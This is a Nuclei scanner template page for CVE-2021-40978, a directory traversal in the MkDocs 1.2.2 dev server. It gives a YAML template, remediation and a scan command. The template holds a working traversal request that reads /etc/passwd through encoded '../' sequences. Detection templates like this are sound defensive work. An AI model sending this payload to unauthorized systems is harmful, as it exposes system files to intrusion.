Skip to content
Nuclei Templates

MKdocs 1.2.2 - Directory Traversal

ID: CVE-2021-40978

Severity: high

Author: pikpikcu

Tags: cve2021,cve,mkdocs,lfi

Description

Section titled “Description”

The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.

YAML Source

Section titled “YAML Source”
id: CVE-2021-40978


info:
  name: MKdocs 1.2.2 - Directory Traversal
  author: pikpikcu
  severity: high
  description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
  impact: |
    An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability.
  reference:
    - https://github.com/mkdocs/mkdocs/pull/2604
    - https://github.com/nisdn/CVE-2021-40978
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40978
    - https://github.com/mkdocs/mkdocs
    - https://github.com/mkdocs/mkdocs/issues/2601
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40978
    cwe-id: CWE-22
    epss-score: 0.04239
    epss-percentile: 0.92255
    cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mkdocs
    product: mkdocs
  tags: cve2021,cve,mkdocs,lfi


http:
  - method: GET
    path:
      - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f4da60efac5f9cc7ca8d788fde7a21f7b00a38f5f55ef7dc2b6fbf6e8f40e56d0220645f8ea6eb4deed155bf7901407b75fdf902999f175aba07a6a48bccaabb2dd5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40978.yaml"

View on Github